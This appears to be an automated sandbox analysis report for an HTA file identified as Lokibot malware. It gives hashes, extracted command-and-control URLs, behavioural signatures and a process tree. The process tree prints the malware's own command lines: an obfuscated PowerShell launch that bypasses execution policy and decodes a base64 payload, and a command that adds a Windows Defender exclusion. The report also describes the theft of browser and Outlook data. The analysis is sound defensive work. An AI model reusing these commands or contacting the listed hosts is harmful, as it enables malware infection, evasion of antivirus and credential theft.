Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 21-11-2024 07:26
Static task: static1
Behavioral task: behavioral1
  Sample: 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
  Resource: win10v2004-20241007-en
General
Target: 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
Size: 23KB
MD5: ec0d423a3f72d69975a1e31a275f5377
SHA1: 213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256: 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA512: 8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
SSDEEP: 96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures

Lokibot family

Blocklisted process makes network request (1 IoC)
  flow 4, pid 2344, process poWERShell.eXe
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid 1640, process powershell.exe
Downloads MZ/PE file
Evasion via Device Credential Deployment (2 IoCs)
  pid 2344, process poWERShell.eXe
  pid 1792, process powershell.exe
Executes dropped EXE (2 IoCs)
  pid 2592, process wininit.exe
  pid 1632, process wininit.exe
Loads dropped DLL (3 IoCs)
  pid 2344, process poWERShell.eXe
  pid 2344, process poWERShell.eXe
  pid 2344, process poWERShell.eXe
Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials and other sensitive data.
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (wininit.exe)
  Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (wininit.exe)
  Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (wininit.exe)
Suspicious use of SetThreadContext (1 IoC)
  PID 2592 set thread context of 1632: pid 2592, process wininit.exe, procid_target 40
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (csc.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cvtres.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (wininit.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (mshta.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (poWERShell.eXe)
Modifies Internet Explorer settings (1 IoC)
  Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid 2344, process poWERShell.eXe
  pid 1792, process powershell.exe
  pid 1640, process powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege, pid 2344, process poWERShell.eXe
  Token: SeDebugPrivilege, pid 1792, process powershell.exe
  Token: SeDebugPrivilege, pid 1640, process powershell.exe
  Token: SeDebugPrivilege, pid 1632, process wininit.exe
Suspicious use of WriteProcessMemory (34 IoCs; identical rows collapsed with their count)
  PID 2500 wrote to memory of 2344: pid 2500, process mshta.exe, procid_target 30 (4 rows)
  PID 2344 wrote to memory of 1792: pid 2344, process poWERShell.eXe, procid_target 32 (4 rows)
  PID 2344 wrote to memory of 2728: pid 2344, process poWERShell.eXe, procid_target 33 (4 rows)
  PID 2728 wrote to memory of 2848: pid 2728, process csc.exe, procid_target 34 (4 rows)
  PID 2344 wrote to memory of 2592: pid 2344, process poWERShell.eXe, procid_target 37 (4 rows)
  PID 2592 wrote to memory of 1640: pid 2592, process wininit.exe, procid_target 38 (4 rows)
  PID 2592 wrote to memory of 1632: pid 2592, process wininit.exe, procid_target 40 (10 rows)
outlook_office_path (1 IoC)
  Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (wininit.exe)
outlook_win_path (1 IoC)
  Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (wininit.exe)
Processes

(depth 1) C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta"
  PID: 2500
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  (depth 2) C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
    Command line: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'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'+[CHAR]0x22+'))')))"
    PID: 2344
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
      PID: 1792
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    (depth 3) C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xg6ussaw.cmdline"
      PID: 2728
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      (depth 4) C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAB8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAB7.tmp"
        PID: 2848
        - System Location Discovery: System Language Discovery

    (depth 3) C:\Users\Admin\AppData\Roaming\wininit.exe
      Command line: "C:\Users\Admin\AppData\Roaming\wininit.exe"
      PID: 2592
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
        PID: 1640
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      (depth 4) C:\Users\Admin\AppData\Roaming\wininit.exe
        Command line: "C:\Users\Admin\AppData\Roaming\wininit.exe"
        PID: 1632
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads